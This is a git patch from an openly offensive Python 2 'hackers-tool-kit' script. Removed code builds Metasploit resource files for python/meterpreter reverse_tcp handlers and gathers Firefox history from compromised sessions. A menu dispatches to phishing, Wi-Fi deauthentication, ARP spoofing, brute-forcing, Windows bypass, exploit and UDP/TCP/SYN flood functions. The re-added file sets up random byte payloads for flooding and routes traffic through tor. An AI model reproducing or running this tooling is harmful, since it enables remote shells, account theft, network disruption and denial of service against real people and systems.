yn == "y": - os.system('echo "use exploit/multi/handler\n" >> pyload.rc') - os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') - os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) - os.system('echo "exploit\n" >> pyload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r pyload.rc') - os.system('rm -rf pyload.rc') - if yn == "n": - os.system('echo " "') -#----------# -#PYLOAD END# - - -#FOXHIS START# -#------------# -def foxhis(): - os.system('echo "sessions\n" >> foxhisses.rc') - os.system('echo "exit\n" >> foxhisses.rc') - os.system("service postgresql restart") - os.system('msfconsole -q -r foxhisses.rc') - os.system('rm -rf foxhisses.rc') - print "\n" - ses = raw_input("Session: ") - print "\nMaximum time (seconds) to wait for a response\n" - time = raw_input("Timeout: ") - os.system('echo "use firefox/gather/history\n" >> foxhis.rc') - os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) - os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) - os.system('echo "run\n" >> foxhis.rc') - os.system('msfconsole -q -r foxhis.rc') - os.system('rm -fr foxhis.rc') -#----------# -#FOXHIS END# - - -#RHAWK START# -#-----------# -def rhawk(): - os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") -#---------# -#RHAWK END# - - -#NANO START# -#----------# -def nano(): - print "opening nano in \033[93m/root/\033[0m folder" - os.system("sleep 2") - os.system("cd /root/ && nano") -#--------# -#NANO END# - - -#UPDATE HACKERS-TOOL-KIT START# -#-----------------------------# -def update(): - os.system("cd /root/hackers-tool-kit/ && python htkupdate.py") -#---------------------------# -#UPDATE HACKERS-TOOL-KIT END# - -#COMPILE C START# -#---------------# -def compilec(): - print "filename / filepath" - r = raw_input("> ") - print "\nfilename2 / filepath2" - h = raw_input("> ") - - a = 'g++ {0} -o {1}'.format(r,h) - os.system(a) -#COMPILE C END# -#-------------# - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - if x == "phpload": - phpload() - if x == "pyload": - pyload() - if x == "foxhis": - foxhis() - if x == "rhawk": - rhawk() - if x == "nano": - nano() - if x == "update": - update() - if x == "compilec": - compilec() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 49bb009696a990173415624bcd39d6295bbb913d Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 30 Jun 2019 05:40:06 +0100 Subject: [PATCH 178/214] Add files via upload --- htk.py | 3229 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 3229 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..2527b3a --- /dev/null +++ b/htk.py @@ -0,0 +1,3229 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#WARNING START# +#-------------# +from tkinter import * +win = Tk() +warn ='I AM NOT RESPONSIBLE FOR ANY DAMAGE CAUSED WITH THIS TOOL WHATEVER YOU DO WITH THIS TOOL IS ON YOU' +messageVar = Message(win, text = warn) +messageVar.config(bg='red') +messageVar.pack( ) +win.title('HTK: Warning!') +button = Button(win, text='OK', width=25, command=win.destroy) +button.pack() +win.mainloop() +#-----------# +#WARNING END# + +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] [ \033[1m\033[32mREADY \033[0m]" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """ + type ? for help +\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + type ? for help + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + + type ? for help + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + type ? for help + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner8(): + print """ + type ? for help\033[91m + +@@@ /$$ /$$ @@@ +@@@ | $$ | $$ @@@ +@@! | $$ | $$ @@! +!@! | $$$$$$$$ !@! +!!@ | $$__ $$ !!@ +!!! | $$ | $$ !!! +!!: | $$ | $$ !!: +:!: |__/ |__/ :!: +@@@ @@@\033[94m +@@@ @@@ +@@! @@! +!@! /$$$$$$$$ !@! +!!@ |__ $$__/ !!@ +!!! | $$ !!! +!!: | $$ !!: +:!:---------------| $$---------------:!: +@@@ | $$ @@@ +@@@ | $$ @@@ +@@! |__/ @@! +!@! !@!\033[91m +!!@ !!@ +!!! /$$ /$$ !!! +!!: | $$ /$$/ !!: +:!: | $$ /$$/ :!: +@@@ | $$$$$/ @@@ +@@@ | $$ $$ @@@ +@@! | $$\ $$ @@! +!@! | $$ \ $$ !@! +!!@ |__/ \__/ !!@ +!!! !!! +!!: !!: +:!: :!:\033[92m + :: :: +: @tuf_unkn0wn :\033[0m +""" +def mainbanner9(): + print """ +\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ +║ ║ +\033[33m║ ║ +║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ +\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ +║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ +\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ +║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ +\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ +║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ +\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ +║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ +\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ +║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ +\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ +║\033[0m █ ▐ ▀ █ ▐ \033[95m║ +\033[35m║\033[0m ▐ ▐ \033[35m║ +║ ║\033[1;31m +╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m + type ? for help + """.decode('utf-8') + +def mainbanner10(): + print """\033[0m + ░░░▓█▒░▒▒▒▓▓░ + ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ + ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ + ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ + ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ + ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ + ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ + ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ + ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ + ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ + ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ + ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ + ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ + ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ + ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ + ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ + ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ + ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ + ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ + ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ + ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ + ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ + ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ + ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ + ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ + ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ + ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ + ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ + ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ + ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ + ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ + ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ + ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ + ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ + ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ + ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ + ░█▓▓▓▓▓▓███████▓██▓██░ + ░██▓▓▓████████████████░░░ + ░▓▓▓▓▓███████▓█▓████████░ ░░░ + ░░░█▓█████████████████████████▓▓▓▒░░░░░░ + ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ + ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ + ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ + ░░▓█▓█▓█████████████████████████████░░ + \033[0m""".decode('utf-8') +def mainbanner11(): + print """\033[91m + ██████╗ ██████╗ ██████╗ + ██╔════╝ ██╔════╝ ██╔════╝ + ███████╗ ███████╗ ███████╗ + ██╔═══██╗██╔═══██╗██╔═══██╗ + ╚██████╔╝╚██████╔╝╚██████╔╝ + ╚═════╝ ╚═════╝ ╚═════╝ + ░░░░ ░░░░░ + ░▒███████▓▒░░ ░░░████████▓░░░ + ░▓████████████▒░░ ░░█████████████░░ + ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ + ░ ░██████▒░ ░░░░███████ ░░ + ░░███████░░ ░░██████▓░ + ░███████░░ ░▒██████▒ + ░░░░ ░░███████░░░███████▒░ ░░░ + ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ + ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ + ░▒██████████████▒████████▒██████████████░░ + ░░██████████████▒░███▒▒▒█████████████░░ + ░░░░▓████████░█░▓▓▒████████▒░░░░░ + ░░████████▓░██░████████▒░░░ + ░░▒██████░▒▒░░▒░░██████░ + ░░█████████▓░█░████▓███▓░ + ░▒█▓░▒██████▒███████░░█▓░ + ░░░███████████████████▓░░ + ░▒▓████████████████▒░ + ░░▒███████████████▓▒░ + ░▒█████▓██████░░ + ░██████████░ + @tuf_unkn0wn ░█████████▒ type ? for help + █████████░░ + ░░████████░░ + ░▓█████▓░ + ░▓████▒░ + ░░████░ + ░░░▒██░░ + ░█▓░ + ░░▓░░ + ░░░░░ + ░░ + \033[0m""".decode('utf-8') +def mainbanner12(): + print """\033[91m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner13(): + print """\033[92m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ 